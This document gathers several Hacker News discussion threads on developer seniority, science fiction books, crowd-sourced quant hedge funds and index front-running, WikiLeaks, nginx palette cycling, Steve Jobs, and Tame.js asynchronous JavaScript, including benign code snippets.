Ask HN: What constitutes a "Senior Developer"? - mgkimsal
There's been a few threads on hiring recently, and I've been a little surprised as to what constitutes "senior developer" status in some peoples' minds.<p>Do you have any particular criteria you use when applying that label to someone (or yourself)? If someone refers to themselves as a "Senior Developer", what characteristics do you look for right off the bat, whether in a resume or face to face?
======
hkarthik
It's all relative to your environment. A senior developer in one shop might be
one of the more junior guys in the next shop. Salaries also vary depending on
the market rates for the stack.
To me, deciding on whether someone's a Senior Developer depends on few things:
1) How much experience do they have in a stack similar to mine?
2) How much of their time would be spent learning versus doing?
3) How much of their time would be spent doing versus teaching?
Juniors learn a lot, Mid levels do a lot, Seniors teach a lot. Everyone's a
doer, but the difference between a senior and a mid level is that the senior
takes on the additional responsibility of teaching.
The next level is Lead, which is doing, teaching, and being held accountable
for others' success.
~~~
codeonfire
I don't really see what teaching has to do with it. Not every developer's goal
is to teach. The idea that the most capable developers should give up doing to
pursue teaching is not very good economics. This assumes that the optimum
balance is to have a well normalized force of average developers. In reality,
you need extreme outlier doers. It's only because management is not optimizing
for value creation that teaching is valued. They want a large growing number
of average subordinates, not a fixed amount of commandos.
------
kls
To me there are only a couple of factors that create what I consider to be a
senior:
First a large app under their belt, one in which they held an architecture
type role and designed the system.
Second, full stack knowledge, if they are doing web, that means HTML, CSS,
JavaScript, a REST API and back end language, and a database technology.
At this point I would consider them a Senior but specialized.
Once they know a few different options for each part of the stack I would
consider them to be a senior. For example knowing Dojo and jQuery for the
client, Node.js, ROR, and Java for the REST layer and back end, and several
relational and or NoSQL datastores.
In addition to that, they should know how to administer the infrastructure
that comes along with those stacks, such as web servers, virtualization, etc.
Finally, they would have an SCM pattern down that works for them; they would
have an issue tracking, source control, and documentation pattern that they
can adapt to projects.
To me those are the marks of a Senior Developer, but those are only the
ingredients; a senior has to be able to parlay that knowledge into leadership
and creativity.
~~~
mgkimsal
How long do you think it would take most people to reasonably achieve those
milestones, and also retain competence in all of them? 2 years? 5 years? 10
years?
Personally, I'd done all those within 5 years (with one system I'd built and
administered almost from scratch doing north of $500 million in revenue per
year). But... I'm not sure I'd have called myself a senior developer at that
time. I think others did for job/work purposes, but I didn't self-identify
with that term.
I didn't feel comfortable calling myself a sr dev until I'd been able to
repeat the earlier successes multiple times over a few more years.
But... maybe that's just me.
~~~
kls
I think it is between the 5 to 10 mark. I think a lot of people realize that
they have hit the mark long after their talents have put them on it. For some
reason, people over assume competency in others in our industry. I think it
has something to do with the fact that smart people generally rate themselves
as less intelligent than they are perceived when self-assessing. When I
reflected on my career, I realized that I was a senior for about 3 years
before I knew I was a senior. I don't know if that is standard but looking at
the guys I have mentored who have come of age it seems to be.
------
gharbad
It's a job title. It really doesn't mean anything other than that they are
likely making a bit more money than mid-level.
I've worked with junior/mid-level devs that are amazing and senior developers
that couldn't string three lines of code together.
------
kavi
Well, in Greece a _senior_ developer is a 28+-yo bald feller that f's his m0m
and is also an ugly code/idea stealer/plagiarizer from Day 1.
I'm 35 and still not considered a _senior_ developer (although I mentor two
junior guys). This is due to the fact that I get things done, something very
bad in the corrupt Greek state.
Cheers, <http://www.nkavvadias.com/hercules/>
------
stray
When hiring a developer, we call them "Senior Developer" so they'll ask the
_next_ company to pay them more money. We'd rather keep the money and pay
intangibles. Makes the shareholders happy and at the end of the day, that's
all that matters.
Turns out the extra ink on business cards is free.
~~~
ohashi
I am not sure whether I am impressed or appalled with this plan. I am
impressed if it keeps your talent from being poached. I also might be appalled
if everyone I met from your company was a senior developer and they didn't
seem to know much.
| {
"pile_set_name": "HackerNews"
} |
My Favorite Science Fiction (and Non-Fiction) Books - mojoe
http://compellingsciencefiction.com/blog/2016-12-18.html
======
unkeptbarista
I'll counter with:
1) Dune - Frank Herbert
2) Mote in God's Eye - Niven & Pournelle
3) Lord of Light - Roger Zelazny
4) Xeelee Series - Stephen Baxter (Or the Manifold: books)
5) The Well World Saga - Jack L. Chalker (Stick with the first 5 books)
~~~
mojoe
Thanks, I haven't read 3-5, I'll definitely check those out! Dune is
incredible, although it always felt a little too much like epic fantasy for my
tastes.
| {
"pile_set_name": "HackerNews"
} |
Advice to Someone Just Entering Our Industry - josephscott
http://perspectives.mvdirona.com/2016/11/advice-to-someone-just-entering-our-industry/
======
dba7dba
I'm nowhere near as accomplished as the original author, but let me try adding
a few other tips.
Plan on spending a lot of hours learning/practicing/tinkering to explore and
pick up new tech skills, OUTSIDE of your normal work hours. If you think you
want a 9-5, Mon-Fri job, don't get into this. You won't last. Whatever task
you do will be automated or given to a younger (aka cheaper) worker
eventually. Or the technology you use will become obsolete. Maybe you can last
more than a decade, but your compensation will not seem like a tech worker's.
Basically, plan on being in a self-paced vocational school every few years.
A HN poster mentioned few months ago he was able get to the position of a CTO
by virtually having 2 full time jobs through out his career. One was his
normal 40hr/week job. The other job was also 40hr/week, but unpaid as he just
about spent that much time learning new tech skills.
| {
"pile_set_name": "HackerNews"
} |
A new sort of hedge fund relies on crowd-sourcing - miobrien
http://www.economist.com/news/finance-and-economics/21721946-amateur-coders-write-algorithms-compete-funds-new-sort-hedge-fund
======
stcredzero
Here's my "Tom Clancy movie plot" evil fund. Someone starts a fund that's
actually based on figuring out the portfolios of Senators, moderately high net
worth congresspersons and other Washington insiders. However, instead of
duplicating the entire portfolios of the whole populace, you first filter for
IQ, an age range where people are starting to be very well connected but still
making their fortunes, and develop another filter based on a quantitative
proxy for riskiness of each investment.
This is what the fund will really be based on, though there will be a fig leaf
fictional method advertised. The purpose of this is to piggyback on the
(technically-not) insider trading such people will manage to do while still
staying within the letter of the law. (Somehow, the collective portfolios of
US representatives manage to greatly outperform the stock market indexes.)
~~~
inputcoffee
This (insider trading by representatives) was common practice till the STOCK
act:
[https://en.wikipedia.org/wiki/STOCK_Act](https://en.wikipedia.org/wiki/STOCK_Act)
Check out the amendment in the last paragraph for more ideas for your Tom
Clancy movie.
~~~
ksherlock
It still is common practice.
[http://www.politico.com/story/2017/05/14/congress-stock-
trad...](http://www.politico.com/story/2017/05/14/congress-stock-trading-
conflict-of-interest-rules-238033)
------
chollida1
We've been seeing these Quantopian fund stories for years now.
Where are the numbers? I mean at some point you have to produce right?
[https://news.ycombinator.com/item?id=12171843#12173142](https://news.ycombinator.com/item?id=12171843#12173142)
[https://news.ycombinator.com/item?id=12950276#12952666](https://news.ycombinator.com/item?id=12950276#12952666)
[https://news.ycombinator.com/item?id=12335272#12336086](https://news.ycombinator.com/item?id=12335272#12336086)
The biggest issue I see for a Quantopian fund is the "skin in the game" rule.
All of the successful fund managers I know have a very unhealthy portion of
their net worth in their own funds.
It's not clear to me that the quantopian algo designers will be able to, or be
forced to, put their own money into their strategies. I find "skin in the
game" to be one of the most promising alpha signals that still persists to
date.
~~~
zeppoleppo
This is an interesting comment as we have no way of validating how much money
designers are putting into their own algorithms.
I started building algorithms on Quantopian 2.5 years ago, using it as a way
to teach myself how to code because I come from a finance background and had
no coding experience. I now have a portfolio of algorithms that consistently
produce alpha (so far). My favorite algorithm does valuations and then buys
and holds for long periods of time. I don't actually invest any money into
this algorithm but rather use it as a prescreener for my own personal
investments. I have a significant amount of 'skin in the game' because of the
amount of time I have invested in developing my algorithms in addition to half
of my (very little) net worth being allocated based on the suggestions of my
algorithm.
I wouldn't be surprised if other designers were in the same boat. This is
purely anecdotal but I hope it helps.
~~~
Danieru
Do you know if there is something similar which can run against stocks traded
on the Japanese markets? I would love to write a pre-screener for myself.
------
creeble
Uh, isn't "the market" just the ultimate crowd-sourced fund?
~~~
jonbarker
The market is like a giant voting machine but not really a fund, since nobody
is managing it.
~~~
kgwgk
Index funds exist since the seventies.
~~~
jonbarker
Index funds actually still have a manager, whose only job is to rebalance
periodically and accurately.
------
inthewoods
I'll repeat what I've said before about these platforms - I don't see why any
institutional money would ever flow to them. Most startup funds require at
least 5 years of audited history before any capital allocator will touch them.
They might get some small quick money from fund-of-funds, but I think they'll
be hard-pressed to keep it. Given the relative short history on these
platforms and the likely churn in algos, I can't see anyone putting serious
money into them.
One of the other problems I see with these platforms is that there is nothing
that stops me, as far as I can tell, from pulling my algo from that platform
once it is successful. Now there are lots of reasons why I could see people
not doing that (running your own fund is hard, raising capital is difficult),
but I don't see why anyone that is successful wouldn't immediately exit the
platform in order to maximize their return.
~~~
Houshalter
For numer.ai you can't leave. The data you get is private and encrypted. So
even if you come up with a great algo, you depend on them to do anything with
it.
~~~
klipt
Unless some other fund buys the same expensive data?
------
quantgenius
The problem with Quantopian, many current robo-advisors (including some with
large valuations) and other market-related fintechs is that by and large they
don't seem to have anyone who has had real success actually trading automated
quantitative strategies at a serious hedge fund or tier-1 proprietary trading
group on their founding teams. I've seen successful VCs, well-known academics,
market gurus, people with a background in some aspect of running a mutual fund
and all manner of other people who seem like they should be good, but nobody
with an actual track record. I've seen people who worked on technology at
hedge funds but the technology group at a hedge fund builds what amounts to
plumbing like clearing, reporting etc, not the actual trading technology,
certainly nothing that can actually impact PNL.
Jonathan Larkin at Quantopian comes closest to what is needed and since he
joined Quantopian has certainly had good success, but even his experience was
more along the lines of recruiting and risk-managing portfolio managers, not
actually running a large book. He certainly helps Quantopian but Quantopian is
coming from a place where when it was founded, I personally had to explain
what selection bias meant to John Fawcett and despite Jonathan Larkin being
there, they still seem to be making some pretty basic mistakes in how the
platform is setup.
Spending a few years working on a tier-1 automated trading desk is absolutely
essential because what is deployed at those firms (and what you are competing
with) is years if not decades ahead of academia and the rest of the industry.
You learn more in a week of working on a successful trading desk (which only
happens if you demonstrate much more than academic aptitude), with people
sharing knowledge available nowhere else, than in a decade in academia or
anywhere else, even in other groups at the same firm potentially sitting 10
feet away from the trading group. I'm not suggesting people steal IP or
anything like that, but you do have to have some sense of what the state of
the art actually is if you are going to claim to have developed something
state of the art.
I suspect it's going to end up like the search space, where the space will be
taken over by the second generation of firms that nobody has heard of who
decide to do things differently from how investment management is currently
run offline taking advantage of their knowledge of how mutual funds including
index funds are picked off by sophisticated traders.
Interestingly, Igor Tulchinsky at Worldquant and his team who are a tier-1
trading shop have basically been running a very successful version of what
Quantopian hopes to become without a lot of hoopla or publicity for years,
decades if you include the time they were doing this as an independent team at
Millenium.
~~~
tanderson92
> how investment management is currently run offline taking advantage of their
> knowledge of how mutual funds including index funds are picked off by
> sophisticated traders.
This is news to me, I was not aware that most index funds are being front-run
to such a large degree. I understand it was possible with the Russell 2000
index at some point. But e.g. the Vanguard Total Market fund (CRSP index) has
almost identical performance to the Fidelity Total Market index fund (Dow
Jones Total Market). And both funds replicate the performance of e.g. the
Ibbotson book.
How is it possible that this is occurring if the index funds are being picked
off? Or do you mean style / sector index funds, not broad market?
~~~
quantgenius
I don't mean to be snarky but I fail to understand why you believe that the
fact that the Vanguard Total Market Fund has almost identical performance to
the Fidelity Total Market fund and that both funds replicate the performance
of e.g. the Ibbotson book is an argument either for or against my statement
that sophisticated traders are able to make lots of money due to the actions
of index funds. I don't mean to be snarky and I would really like to give you
a meaningful answer but I'm not sure how to proceed and I'd like to understand
why you believe the two have anything to do with each other so I can give you
a higher quality reply.
~~~
tanderson92
they follow different indices and have similar returns. Please explain how
this is possible while still underperforming what they 'should' be returning.
Are both indices being front-run? But if they reconstitute at different times
how is this possible.
And yes, you do sound snarky.
~~~
quantgenius
> they follow different indices and have similar returns. Please explain how
> this is possible while still underperforming what they 'should' be
> returning.
They are both equity indices and equities are highly correlated to each other.
The first principal component of global equity returns explains over 50% of
the variance.
> Are both indices being front-run?
Yes! If a stock is getting added to (or dropped from) an index, this is typically
announced (depending on the index) between 3 days and a month before the date
on which the change to the index is made. The index itself is calculated
assuming you bought (or sold) precisely at the close on the day of the
reconstitution. Index fund managers are incentivized to match the index. They
actually do worse personally if they modestly outperform the index and
potentially get fired if they underperform. So every index fund manager wants
to buy (or sell) the stock entering (or leaving) the index at precisely the
same time on the same day. This means you could potentially have as much as a
few months trading volume wanting to transact on the same side at precisely
the same time. Smart traders take advantage of this by a) Buying (selling
short for deletes) the stock over time before the index is reconstituted. b)
Selling what they bought and short selling more (or buying) stock to the index
funds at the close and c) Covering their shorts (or selling the excess stock
bought) over the next few weeks. The fund managers don't care because even
though a typical proprietary trading desk makes tons of money doing this, as
far as their clients are concerned, they are matching the index. You could
move a stock 50% in the rebalance but you wouldn't notice if you were
comparing a fund's returns relative to the index.
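The a)/b)/c) mechanics above can be sketched as a toy Monte Carlo. All the
parameters here are assumptions for illustration only, not calibrated to any
real index or to the academic estimates mentioned below:

```python
import random

random.seed(42)

# Stylized, assumed parameters -- illustration only.
PRE_DRIFT = 0.03        # average move between announcement and reconstitution
POST_REVERSION = -0.01  # average partial give-back after the rebalance
NOISE = 0.01

def one_addition():
    """Simulate one index add from the front-runner's point of view."""
    drift = random.gauss(PRE_DRIFT, NOISE)
    reversion = random.gauss(POST_REVERSION, NOISE)
    # (a) buy at announcement, (b) sell to the index funds at the close:
    trader_pnl = drift
    # (b)/(c) short extra stock at the close, cover after the reversion:
    trader_pnl += -reversion
    # The index fund buys at the inflated close; relative to the announcement
    # price it overpaid by `drift`, and the index hides this because the
    # index itself is computed from that same close.
    fund_hidden_cost = drift
    return trader_pnl, fund_hidden_cost

n = 10_000
results = [one_addition() for _ in range(n)]
avg_trader = sum(t for t, _ in results) / n
avg_cost = sum(c for _, c in results) / n
print(f"avg front-runner PnL per add: {avg_trader:+.2%}")
print(f"avg hidden cost to the fund:  {avg_cost:+.2%}")
```

The point of the sketch is the last line of the comment: the fund's hidden
cost never shows up as tracking error, because the benchmark is computed from
the same inflated close the fund traded at.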
This is fairly obvious if you simply take a look at price charts of stocks
entering and leaving indices around index reconstitutions. Academic studies
(use google scholar for a few dozen references) estimate that the typical
index addition or deletion to the S&P 500 index moves between 2-4% between
announcement and reconstitution. This is an underestimate of what actually
happens because adds/deletes are predictable and stocks start moving long
before the announcements are made. S&P 500 stocks are the most liquid stocks
on the planet and the effect is much larger for other indices. The Russell
indices are not much more or less gameable than other indices per add or
delete but the effects are concentrated since all Russell Index rebalances
happen on a single day (fourth Friday in June) which creates massive jumps in
PNL for proprietary trading desks right around that time.
It's also fairly obvious if you look at the data carefully that in recent
years with the increasing popularity of index funds, the indices are
understating the potential returns available in the stock market. The market
has done "better" than the oft-quoted returns on the indices would have you
believe.
> But if they reconstitute at different times how is this possible.
Why would the timing of the reconstitution have anything to do with why this
is possible or not?
~~~
tanderson92
I explicitly avoided mentioning the S&P500. Why did you bring it up? It makes
your point nicely but I'm not talking about the S&P500 or the R2k as examples
where front running of any significance is happening. The index
additions/deletions in the Total Market indices happen at the margins: micro-
cap stocks (and IPOs). Hard to argue much happens of any effect with micro-cap
stocks.
I don't necessarily disagree with you on the S&P500 or R2k, but it's much
harder to make the same argument for total market indices.
Please justify how you are saying the market returns understate potential
market returns. If it is not an index you are using, what is it?
> Why would the timing of the reconstitution have anything to do with why this
> is possible or not?
Because they have similar returns and add/remove stocks at different times. If
Vanguard's total market fund adds a stock after Fidelity's, then any jump
("front-running") in share price due to Vanguard's purchases would be captured
in a higher return for Fidelity since it already owned the shares.
------
DennisP
Numerai is also doing this: [https://numer.ai/](https://numer.ai/)
------
theprop
I think I found a new interview question: write an algorithm that outperformed
the market for the past ten years...you have 35 minutes...
~~~
dx034
That's easy and doesn't take 35 minutes. Here's the algorithm:
If year < 2009: short stocks
else: buy stocks
Add some leverage to this and you made a lot of money. Doesn't mean it'll work
in the future, though.
------
nether
One of Quantopian's studies shows that backtesting poorly predicts live
trading results: [https://blog.quantopian.com/using-machine-learning-to-
predic...](https://blog.quantopian.com/using-machine-learning-to-predict-out-
of-sample-performance-of-trading-algorithms/). From the forums, it looks like
90% of the effort is devoted to getting a good backtest, a yardstick which
might not have any bearing on reality. How do real quant traders deal with
this discrepancy?
~~~
akrymski
Real firms use tick data to backtest, not the 1 minute bars that Quantopian
uses, and spend a lot of time simulating network characteristics such as data
and order latency. They also use machine learning, which isn't possible on
Quantopian, to build models, which requires downloading lots of data (and not
just equities). No serious quant will ever use such a tool. You might as well
go to the casino.
~~~
akrymski
Edit: tick data is usually collected over time, because data sources have
different characteristics, and you should be testing over the same realtime
data that you'll be using to trade live. You need to know the bid/ask prices
and volumes, in order to know where to place limit orders. Otherwise you are
just paying commissions and spreads to brokers and market makers.
WikiLeaks Turned Down Leaks on Russian Government During US Pres. Campaign - putsteadywere
http://foreignpolicy.com/2017/08/17/wikileaks-turned-down-leaks-on-russian-government-during-u-s-presidential-campaign/
======
putsteadywere
"in 2010, Assange vowed to publish documents on any institution that resisted
oversight... “We don’t have targets,” Assange said at the time."
But by 2016, WikiLeaks had switched course, focusing almost exclusively on
Clinton and her campaign.
Approached later that year by the same source about data from an American
security company, WikiLeaks again turned down the leak. “Is there an election
angle? We’re not doing anything until after the election unless its [sic] fast
or election related,” WikiLeaks wrote. “We don’t have the resources.”
Anything not connected to the election would be “diversionary,” WikiLeaks
wrote.
Premature Optimization and the Birth of Nginx Module Development - mattyb
http://evanmiller.org/premature-optimization-and-nginx-module-development.html
======
Smerity
I always wondered why an Nginx module that was about generating a circle had
such prominence on the Nginx website and now I can say I understand =]
Although this was premature optimization I still find it a beautiful hack. The
author was still not content with the C solution of actually generating the
GIF each time (which took 30ms, actually a long time for servers) and instead
reframed the problem at a deeper level and created a beautiful little hack
that just modified the palette table.
~~~
jarin
If you like that, you should look into old-school color cycling/palette
shifting techniques used in the 8-bit era.
Someone did it with HTML5 too:
[http://www.effectgames.com/effect/article.psp.html/joe/Old_S...](http://www.effectgames.com/effect/article.psp.html/joe/Old_School_Color_Cycling_with_HTML5)
Demo:
<http://www.effectgames.com/demos/canvascycle/?sound=0>
~~~
StavrosK
I've seen that before, but I'm still amazed at how beautiful it is. I can't
fathom how simple palette cycling can produce these effects, even when I'm
looking at the palette.
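The effect is easy to demystify: the pixel data stays fixed as palette
indices, and all the motion comes from rotating the palette itself. A minimal
JavaScript sketch of the idea (plain arrays standing in for image data, no
canvas; all names here are invented for illustration):

```javascript
// Pixels are stored once as palette indices; they never change.
const pixels = [0, 1, 2, 3, 0, 1, 2, 3];

// The palette maps an index to a color. Animating is just rotating it.
let palette = ["#000", "#555", "#aaa", "#fff"];

function cyclePalette(pal) {
  // Move the last color to the front: every pixel using index 0
  // now shows what index 3 showed before, and so on.
  return [pal[pal.length - 1], ...pal.slice(0, -1)];
}

function render(pixels, pal) {
  return pixels.map((i) => pal[i]);
}

// One "frame" of animation without touching a single pixel value:
const frame0 = render(pixels, palette);
palette = cyclePalette(palette);
const frame1 = render(pixels, palette);
```

Same idea as the nginx circle-module hack: rewrite the tiny palette table, not
the image.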
Ask HN: Did Steve Jobs have any technical skills? - angrisha
This question has been haunting me for quite some time. Was steve Jobs just the marketing guy? Or was he involved in hardware/software development of the apple devices too?<p>Thank you.
======
wh-uws
For some reason this old wives' tale of Steve not being technical has been
catching on more recently.
Read this story here about a 12-year-old Steve.
[http://blog.eladgil.com/2011/09/12-year-old-steve-jobs-
meets...](http://blog.eladgil.com/2011/09/12-year-old-steve-jobs-meets-
bill.html)
And decide if you would still like to believe he's not technical.
------
Hitchhiker
To work with someone like Woz in the early days implies that Steve could at
least hold his own while herding a bunch of highly skilled folks forward.
Vision is not just about skills. It is something far deeper and not entirely
rational or a result of 10,000 hours of training.
[http://forums.appleinsider.com/archive/index.php/t-19686.htm...](http://forums.appleinsider.com/archive/index.php/t-19686.html)
seems to have a good discussion on the subject.
------
willvarfar
Where did he meet Woz? A marketing convention?
~~~
profitbaron
Steve Wozniak became friends with Steve Jobs, when Jobs worked for the summer
at a company where Wozniak was working on a mainframe computer.
~~~
coryl
Possibly HP?
------
glimcat
He was a tech for Atari at one point.
Gene-Edited Babies: What a Chinese Scientist Told an American Mentor - pseudolus
https://www.nytimes.com/2019/04/14/health/gene-editing-babies.html
======
nkingsy
So much of science seems to be run on handshakes (peer review, IRB in this
article), and from the outside it looks like they’re experiencing problems
scaling.
There is a joke about science police in there, but it seems like a lot depends
on the ethics of individual scientists and the institutions that support them.
Tame.JS: Flow-control by the makers of OkCupid.com - petar
http://tamejs.org/
======
aston
I've been waiting for this sort of thing for the longest. The first time I saw
the callback passed to a callback of a callback's callback style in Node.js, I
wondered why the code couldn't look as nice as the async C++ I'd written at
OkCupid. From my lips to Max & Chris's minds... (telepathy!)
How long 'till the port to CoffeeScript syntax?
~~~
malgorithms
It's funny, when Max started programming Tame.Js a couple weeks ago, I
exchanged emails with a developer who tried to make something similar for
CoffeeScript who couldn't convince others it was needed. He said the common
response was that if you need something like Tame for async you're not "doing
it right." (Obviously we disagree.)
~~~
jashkenas
I'd be more than happy to explore the addition of Tame.js-style CPS to the
CoffeeScript compiler -- but there's a lot of prior work there already:
<https://github.com/jashkenas/coffee-script/issues/241>
<https://github.com/jashkenas/coffee-script/issues/287>
<https://github.com/jashkenas/coffee-script/issues/350>
_Edit_ :
Things look a little less promising after running a simple test. This input
JavaScript:
while (i--) {
    twait {
        fs.readFile("one");
        fs.readFile("two");
    }
}
Gets compiled into this resulting "tamed" JavaScript:
var tame = require('tamejs').runtime;
var __tame_fn_0 = function (__tame_k) {
var __tame_k_implicit = {};
var __tame_fn_1 = function (__tame_k) {
if (i --) {
var __tame_fn_2 = function (__tame_k) {
var __tame_ev = new tame.Event (__tame_k);
var __tame_fn_3 = function (__tame_k) {
fs .readFile ( "one" ) ;
fs .readFile ( "two" ) ;
tame.callChain([__tame_k]);
};
__tame_fn_3(tame.end);
__tame_ev.trigger();
};
tame.callChain([__tame_fn_2, __tame_fn_1, __tame_k]);
} else {
tame.callChain([__tame_k]);
}
};
__tame_k_implicit.k_break = __tame_k;
__tame_k_implicit.k_continue = function() { __tame_fn_1(__tame_k); };
tame.callChain([__tame_fn_1, __tame_k]);
};
__tame_fn_0 (tame.end);
... not so nice to work with or debug. The general conclusion of that series
of tickets was that the code generation required to make this CPS
transformation work with all edge cases is a bit too hairy to be worth it on
balance. Depending on how much sequential async you're doing, YMMV.
~~~
maxtaco
It's on the list of todos to preserve the input line-numbering in the output
code. This would mean some changes to the code emitter, and also to the code
emitted to preserve the ordering of statements.
In tame/C++, debugging either compiler or runtime errors is straight-ahead, as
the developer doesn't need to examine the mangled code. Now if only JavaScript
had the equivalent of cpp's #line directive....
~~~
jashkenas
We're getting there ... maybe this summer.
<https://bugs.webkit.org/show_bug.cgi?id=63940>
<https://bugzilla.mozilla.org/show_bug.cgi?id=618650>
------
statictype
Ever since I first heard of CoffeeScript, I'd been hoping that features like
this would make it into the language. It's not realistic to wait for
javascript interpreters in the browser to catch up, but this would be a
perfect addition for a compiler like CoffeeScript.
------
pmjordan
The problem this solves is a serious one, in my experience, even though I find
their choice of syntax rather curious. Given that JavaScript 1.7 introduces
the _yield_ keyword, it would make sense to add support for that to V8 and
implement the infrastructure for concurrent asynchronous I/O around that as a
library. The concurrency aspect is, after all, orthogonal to the blocking vs.
callback situation, and can easily be done even when using callbacks, with a
single callback function called upon completion of all concurrent I/O. I
believe the Dojo framework provides such a utility, and I wrote my own
simplistic stand-alone mini-library for exactly this a while back. [0]
I've run into the problem of endless chained callbacks in C, where it's much
worse due to the lack of nested functions, let alone closures or garbage
collection.[1] I ended up using the switch block "coroutine" hack [2] for the
worst cases, along with dynamically allocated "context" structs to hold
"local" variables. A proper macro system would have helped transform blocking
code into CPS form. I tried to integrate a SC [3] pass into our build, which
could have done it, but ran into all sorts of practical/yak shaving problems,
so I ended up with the C preprocessor macro/switch solution for now. In user
space, explicit stack-switching with something like _swapcontext()_ is
probably preferable, if you can get away with it, but in the kernel this is
rather problematic.
[0] <https://github.com/pmj/MultiAsync-js>
The reason I wrote my own was because I originally needed it in Rhino, the
JVM-based JS implementation, and I couldn't find anything similar that worked
there.
[1] Yes, there are garbage collectors that work with C, but to my knowledge,
none of them can be used in kernel modules. In any case, the other 2 issues
are worse and aren't solveable within the language via libraries.
[2] <http://www.linuxhowtos.org/C_C++/coroutines.htm>
[3]
[http://super.para.media.kyoto-u.ac.jp/~tasuku/sc/index-e.htm...](http://super.para.media.kyoto-u.ac.jp/~tasuku/sc/index-e.html)
~~~
maxtaco
My first thought for implementing tame.js was with yield, but V8 doesn't
currently support it (though it's reserved as a "future" keyword). A direct
use of yield (without anything like twait) would probably make node code look
more like Python/Twisted code, which while better than the status quo, still
can get unmanageable in my experience.
Agreed that twait conflates concurrency with blocking/callbacks, but in my
experience, it's a natural and useful combination.
~~~
bdarnell
I think you could do something manageable with yield alone (at least with
python-style generators). I've been meaning to try something like this with
tornado. The general idea is that yielding would either immediately produce a
callback or asynchronously "wait" for a previously-generated callback to be
run. It would look something like this:
doOneThing(yield Callback("key1"))
andAnother(yield Callback("key2"))
res1 = yield Wait("key1")
res2 = yield Wait("key2")
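For the curious, the driver such a scheme needs is tiny. A hypothetical
JavaScript sketch using generators and promises (the names `run` and
`fakeRead` are invented for illustration): the driver resumes the generator
with each completed async result, so the body reads top to bottom.

```javascript
// Drive a generator that yields promises: resume it with each resolved
// value until it returns. This is the "wrap a generator so it's resumed
// by async completions" idea in about fifteen lines.
function run(genFn) {
  const gen = genFn();
  return new Promise((resolve, reject) => {
    function step(value) {
      const { value: yielded, done } = gen.next(value);
      if (done) return resolve(yielded);
      Promise.resolve(yielded).then(step, reject);
    }
    step(undefined);
  });
}

// A stand-in for an async I/O call.
const fakeRead = (name) =>
  new Promise((res) => setTimeout(() => res(`contents of ${name}`), 10));

// The reads happen asynchronously, but the code looks sequential.
const result = run(function* () {
  const one = yield fakeRead("one");
  const two = yield fakeRead("two");
  return [one, two];
});
```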
------
snprbob86
Looks a lot like C# 5's await/async keywords:
<http://blogs.msdn.com/b/ericlippert/archive/tags/async/>
Cool to see growing interest for this at the language level.
~~~
contextfree
It looks even more like F# async workflows, which compared to the C# async
feature have the advantage of being implemented in the current shipping
version rather than the next one.
------
reustle
I've been very happy with "parallel" in the async library by caolan
<https://github.com/caolan/async>
------
sjs
Why hasn't anyone brought up error handling yet? What happens when an error is
thrown inside a twait block? What happens when 2 errors are thrown inside a
twait block?
Tame.js looks nice in that it's very simple to learn but ~300 lines of plain
old JavaScript[1] can give you a general purpose deferred/promise library with
more flexibility should you need to do something other than wait on N async
operations and then use the results.
[1] [https://github.com/heavylifters/deferred-
js/blob/master/lib/...](https://github.com/heavylifters/deferred-
js/blob/master/lib/deferred.js)
------
geuis
In what significant ways is this different from deferreds/promises/futures?
~~~
voidfiles
I was wondering the same thing. If the spec evolves tools to handle this
stuff, that's one thing, and of course this could be an example solution, but
right now I think the problem has a solution without adding extra keywords to
the language.
~~~
bialecki
I would've thought the same thing until I wrote substantial async code in JS
and Python.
It's not that it doesn't work and you can't do it, it's that the code becomes
a mess and their example gets at that. It probably doesn't seem like a big
deal, but when you constantly have to pass around callbacks and chain requests
together you get this feeling the code could look a lot cleaner than it is.
You want asynchronous behavior but with synchronous syntax.
This isn't possible without adding _something_ , and, having seen a lot of the
solutions out there, it's nice to see someone take a stab at it by changing
the language. The cost is huge (preprocessing, etc.), but, speaking from
experience, the simplicity of the code you write might make the change worth
it. You get the feeling in 5-10 years this will be a solved problem, but I'm
not sure any of the solutions out there yet will be the accepted solution.
------
Pewpewarrows
This seems neat, but after reading through it twice I can't seem to understand
how this provides any advantage over just using Deferreds. Someone care to
enlighten me?
------
va1en0k
That reminds me of monads in Haskell (they can solve this problem (and others
as well) mathemagically). I've seen somewhere a proposal to add them to
JavaScript, but I doubt the idea will be loved by the public.
(By "add them to JS" I mean some syntactic sugar, not a library)
~~~
pmjordan
Proposal? JavaScript 1.7 introduced generators circa 2006, which I do believe
lets you implement something like this (in addition to a bunch of other cool
things).
[https://developer.mozilla.org/en/New_in_JavaScript_1.7#Gener...](https://developer.mozilla.org/en/New_in_JavaScript_1.7#Generators)
Unfortunately, V8 doesn't support generators, as far as I can tell.
~~~
va1en0k
sorry? generators? well, I like generators, but what's your point?
~~~
pmjordan
yield;
Will block execution until the generator is resumed and return control flow to
the caller. I haven't actually tried it, but it should be pretty
straightforward to wrap a generator function in such a way that it's driven
(resumed) by callbacks from async I/O calls.
------
janetjackson
This is the wrong solution to the problem, and it's implemented poorly.
Use a proper control-flow ( not "flow-control" ) library like
<https://github.com/caolan/async>.
Furthermore, why would you write an entire custom js parser for this? Why not
use some of the many many pre-existing ones that are much more stable, more
developed, and well supported.
~~~
__david__
Seriously? The library solution is pretty ugly--though it's a good solution if
you are absolutely dead set against compiling your "javscript". Tame, being a
code transformer, makes the equivalent code _so_ much more readable and clean
looking.
How on earth is readable, clean looking code "the wrong solution to the
problem"? I would argue that it's almost always the _right_ solution to a
problem.
------
frankdenbow
Slightly Unrelated: There was a site recently on hn that was a listing of
various js libraries, like this one, on one page. What was it?
~~~
matthiaswh
There are two that fit your description and are really useful:
<http://www.everyjs.com/>
<http://microjs.com/>
~~~
frankdenbow
thanks! microjs was what i was thinking of
------
yaix
This is nice on the browser, but not very useful in nodeJS.
twait{} will block and stop my nodeJS process from doing anything else.
It would be more useful if I could give twait{} a callback to fire when all
its async events completed. Then my nodeJS process could do other stuff while
waiting for a twait{} bundle to finish.
~~~
malgorithms
No, that's not the case. twait won't block your Node process from handling
other events.
~~~
yaix
Isn't it waiting to execute anything that follows after a twait code block?
If so, then it is blocking. Otherwise, how do you manage to let other code be
executed, except the code you don't want to be executed until all functions in
the twait block have returned?
There would need to be a callback attached to the twait block, but there
isn't. So it's blocking.
Because that is its purpose: to block further execution until all data from
the non-blocking functions has returned.
~~~
baudehlo
From looking at it, each twait block is blocking as a unit, but other code
elsewhere from the twait block will still run.
------
teyc
Also see JSCEX, which uses the C# keyword await
[http://groups.google.com/group/nodejs/browse_thread/thread/3...](http://groups.google.com/group/nodejs/browse_thread/thread/337f83c028f371c2)
------
lzm
The next version of Visual Studio will have something similar:
<http://msdn.microsoft.com/en-us/vstudio/async.aspx>
